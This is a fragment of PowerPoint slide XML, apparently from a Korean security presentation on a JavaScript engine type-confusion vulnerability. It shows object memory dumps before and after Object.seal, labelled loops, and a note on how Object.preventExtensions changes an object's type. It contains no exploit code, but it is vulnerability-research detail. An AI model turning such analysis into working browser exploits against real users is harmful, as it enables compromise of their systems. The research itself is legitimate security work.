                  <a:t>0x3a1c9ef8    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9efc    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f00    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f04    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f08    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f0c    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f10    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f14    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][BEFORE][Object.seal(v12)] %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9eec    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef0    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef4    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef8    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9efc    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f00    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f04    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f08    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f0c    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f10    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f14    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][AFTER][Object.seal(v12)] %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9eec    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef0    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef4    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef8    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9efc    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f00    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f04    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f08    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f0c    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f10    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f14    0x0000002e </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="사각형: 둥근 모서리 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0BB4A26-2ADF-40B1-B4B1-AB9541BC394B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7813896" y="1615245"/>
              <a:ext cx="1942741" cy="4942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34C82C08-1AB9-41F6-85C7-C4E9E0AD3DC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8469297" y="2735048"/>
              <a:ext cx="1355307" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WTF..!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>TypeConfusion..!</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="사각형: 둥근 모서리 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3589122C-329F-4671-8E34-389029460E92}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9787971" y="1619591"/>
              <a:ext cx="1998497" cy="4942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1DCCB60B-FEA2-4381-AEA9-5AF6F726BB4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5839821" y="1765786"/>
              <a:ext cx="1499137" cy="71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912AEB79-7688-4A63-AEB0-C79BF88644E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5839820" y="2561550"/>
              <a:ext cx="1499137" cy="71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1BD13B51-42B3-47A5-8C61-F4546BC583CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5839820" y="3354590"/>
              <a:ext cx="1499137" cy="71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DE34173D-F15F-4EC4-B151-BDA51C492442}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5839330" y="4147630"/>
              <a:ext cx="1474715" cy="71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56B1F3BB-082B-4126-8663-A77277B950CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5839330" y="4963385"/>
              <a:ext cx="1499137" cy="71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6FAC4747-7B8C-4A89-A68B-D779F13ED1FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5839330" y="5733293"/>
              <a:ext cx="1499137" cy="71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1" name="직사각형 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2D4F86-274C-413F-8063-A03A3624C54E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297353" y="1402018"/>
            <a:ext cx="1034588" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>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The First Loop</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102" name="직사각형 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B832441B-E860-4EA0-8996-03ED878D9AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8192602" y="1406300"/>
            <a:ext cx="1185327" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>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The Second Loop</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103" name="직사각형 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE242726-4D4F-462F-B7BA-5D815FFEA1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10231575" y="1406300"/>
            <a:ext cx="1106852" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Third Loop</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="TextBox 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078395C9-672B-4C25-801F-59C64D384BA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2282258" y="3319980"/>
            <a:ext cx="2445457" cy="461665"/>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altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When the Object.preventExtensions function is called, in the second loop the type of the object is changed to NUMERIC_DICTIONARY_TYPE.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="128" name="연결선: 꺾임 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8637CC3-CD37-4589-B430-24AF1CC76031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="49" idx="0"/>
            <a:endCxn id="126" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2406041" y="3403663"/>
            <a:ext cx="720963" cy="1476929"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10365"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3">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0" name="직사각형 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D0179AF-EE88-4773-A913-FD7B22B4516C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061068" y="2592629"/>
            <a:ext cx="496229" cy="841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직사각형 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FA6C6D-FA86-43D2-A767-F4ECD597F4D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077880" y="2591255"/>
            <a:ext cx="608920" cy="868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슬라이드 번호 개체 틀 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C83CDA-F05C-4128-88BF-A53A07CCD1DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="날짜 개체 틀 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0594BDC-7497-4A1B-A471-AED90F305A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0ABEA0DF-D6DF-4BE0-9D57-7348115B85B6}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367623416"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="추억">
  <a:themeElements>
    <a:clrScheme name="추억">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추억">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추억">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5512</TotalTime>
  <Words>10911</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
